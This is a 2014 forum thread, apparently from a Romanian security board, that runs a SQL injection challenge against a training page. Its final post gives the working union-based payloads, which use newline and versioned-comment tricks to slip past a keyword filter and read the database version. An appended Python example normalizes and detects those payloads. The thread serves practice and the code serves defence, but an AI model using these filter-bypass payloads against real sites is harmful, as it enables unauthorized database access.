dancezar (Active Members), posted February 5, 2014 (edited)

Target: http://training.hi2.ro/test/lv1.php?id=1
Method: Union based
Task:
- Display your name
- Extract the version together with the database name
Rules:
- Send the syntax by PM and post a reply with a censored screenshot
Proof:
Note: The site and the script are not mine; I found it on hy.
Solvers:
- Reckon
- xTremeSurfer
- Shello
- askwrite

Edited February 6, 2014 by danyweb09

dancezar (Active Members, Author), posted February 6, 2014

Congratulations, Reckon. Who's next? Come on guys, it's simple ;) especially since Reckon also left you a few hints in the screenshot :))

xTremeSurfer, posted February 6, 2014

PM

Shello, posted February 6, 2014 (edited)

//edit
Why does it say Medium.. it's very easy...
Isn't anyone going to add me to the list too?

Edited February 6, 2014 by Shello

dancezar (Active Members, Author), posted February 6, 2014

> //edit
> Why does it say Medium.. it's very easy...
> Isn't anyone going to add me to the list too?

I've added you to the list.
Let's be serious, this is an easy challenge: https://rstforums.com/forum/80988-easy-sql-injection.rst
Here are a few challenges that have not been closed yet:
https://rstforums.com/forum/76012-hard-sql-injection.rst
https://rstforums.com/forum/74593-sqli-challenge.rst
https://rstforums.com/forum/75984-easy-sql-injection-challenge.rst
https://rstforums.com/forum/76187-strange-sql-injection-challenge.rst
You can consider them very easy :P

dancezar (Active Members, Author), posted February 6, 2014

Challenge closed!
Congratulations once again to the 4 solvers:
Reckon
xtremesurfer
shello
askwrite

Although many of those who tried to solve the challenge rushed straight to /*!50000 and urlencode and other nonsense, the solution was very simple, namely %0a, which represents the newline character, and it looks like this:

To count the columns, group by is used, to which you add /*!12345
http://training.hi2.ro/test/lv1.php?id=1%20/*!12345group*/%0Aby%201+--+
and I got 4 columns, with which I built the union based injection as follows:
http://training.hi2.ro/test/lv1.php?id=1%0Aand%0A0%0Aunion%0Aselect%0A1,2,3,4+--+
To extract the version, @@global.version is used.
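
Why the newline and versioned-comment forms in the closing post get past keyword filters, shown from the detection side as an added example that is not part of the thread. `NAIVE` is an assumed stand-in for a filter that expects a literal space between keywords (the thread does not show the challenge's real filter); `normalize`, `naive_flags` and `normalized_flags` are hypothetical names.

```python
import re
from urllib.parse import unquote, unquote_plus

# Assumed stand-in for a weak filter: keyword pairs joined by a literal space.
NAIVE = re.compile(r"union select|group by", re.I)

# MySQL runs the body of /*!NNNNN ... */ on servers at or above that version,
# so the body is kept; ordinary /* ... */ comments are treated as whitespace.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)
KEYWORDS = re.compile(
    r"\bunion\s+(?:all\s+)?select\b|\b(?:group|order)\s+by\s+\d+", re.I)


def normalize(raw: str) -> str:
    """Canonicalise a raw query-string value before signature matching."""
    value = unquote_plus(raw)          # what the application receives
    for _ in range(2):                 # bounded unwrap of double encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN.sub(" ", value)
    # \s matches \n (%0a) as well as space, tab, \r, \v and \f
    return re.sub(r"\s+", " ", value).strip().lower()


def naive_flags(raw: str) -> bool:
    return bool(NAIVE.search(unquote_plus(raw)))


def normalized_flags(raw: str) -> bool:
    return bool(KEYWORDS.search(normalize(raw)))


# The two id values quoted in the post, plus one constructed benign value.
SAMPLES = [
    "1%20/*!12345group*/%0Aby%201+--+",
    "1%0Aand%0A0%0Aunion%0Aselect%0A1,2,3,4+--+",
    "1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{naive_flags(s)!s:5} {normalized_flags(s)!s:5} {normalize(s)}")
```

Matching on the normalized value is a detection aid for logs and WAF rules; the injection itself is closed by binding `id` as a parameter in the query.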